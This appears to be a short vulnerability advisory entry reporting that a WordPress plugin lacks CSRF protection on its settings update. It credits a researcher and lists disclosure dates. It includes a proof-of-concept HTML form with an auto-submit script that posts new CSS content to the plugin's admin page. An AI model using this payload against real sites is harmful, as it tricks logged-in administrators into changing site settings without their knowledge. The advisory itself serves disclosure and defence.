The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
<form id="test" action="https://example.com/wp-admin/themes.php?page=mycss.php" method="POST"> <input type="text" name="newcontent" value=""> <input type="text" name="info_update" value="Update CSS"> </form> <script> document.getElementById("test").submit(); </script>
Daniel Ruf
Daniel Ruf
Yes
2022-06-06 (about 1 years ago)
2022-06-06 (about 1 years ago)
2023-03-09 (about 6 months ago)